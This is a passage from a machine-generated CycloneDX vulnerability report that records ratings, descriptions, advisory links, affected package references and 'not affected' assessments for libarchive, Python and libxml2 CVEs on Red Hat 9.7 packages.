          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-1632",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        404,
        476
      ],
      "description": "A vulnerability was found in libarchive up to 3.7.7. It has been classified as problematic. This affects the function list of the file bsdunzip.c. The manipulation leads to null pointer dereference. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-1632"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-1632"
        },
        {
          "url": "https://github.com/Ekkosun/pocs/blob/main/bsdunzip-poc"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1632"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7454-1"
        },
        {
          "url": "https://vuldb.com/?ctiid.296619"
        },
        {
          "url": "https://vuldb.com/?id.296619"
        },
        {
          "url": "https://vuldb.com/?submit.496460"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-1632"
        }
      ],
      "published": "2025-02-24T14:15:11+00:00",
      "updated": "2025-03-25T15:41:41+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.5.3-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-1795",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        116
      ],
      "description": "During address list folding, when a separating comma ends up on a folded line and that line is to be unicode-encoded, the separator itself is also unicode-encoded. Expected behavior is that the separating comma remains a plain comma. This can result in the address header being misinterpreted by some mail servers.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-1795"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-1795"
        },
        {
          "url": "https://github.com/python/cpython/commit/09fab93c3d857496c0bd162797fab816c311ee48"
        },
        {
          "url": "https://github.com/python/cpython/commit/70754d21c288535e86070ca7a6e90dcb670b8593"
        },
        {
          "url": "https://github.com/python/cpython/commit/9148b77e0af91cdacaa7fe3dfac09635c3fe9a74"
        },
        {
          "url": "https://github.com/python/cpython/commit/a4ef689ce670684ec132204b1cd03720c8e0a03d"
        },
        {
          "url": "https://github.com/python/cpython/commit/d4df3c55e4c5513947f907f24766b34d2ae8c090"
        },
        {
          "url": "https://github.com/python/cpython/issues/100884"
        },
        {
          "url": "https://github.com/python/cpython/pull/100885"
        },
        {
          "url": "https://github.com/python/cpython/pull/119099"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/03/msg00013.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/MB62IZMEC3UM6SGHP5LET5JX2Y7H4ZUR/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1795"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7570-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-1795"
        }
      ],
      "published": "2025-02-28T19:15:36+00:00",
      "updated": "2026-04-15T00:35:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-27113",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        476
      ],
      "description": "libxml2 before 2.12.10 and 2.13.x before 2.13.6 has a NULL pointer dereference in xmlPatMatch in pattern.c.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-27113"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/10"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/11"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/12"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/13"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/4"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/5"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/8"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/9"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-27113"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/861"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/02/msg00028.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27113"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250306-0004/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7302-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-27113"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2025/02/18/2"
        }
      ],
      "published": "2025-02-18T23:15:10+00:00",
      "updated": "2025-11-03T22:18:43+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.9.13-14.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
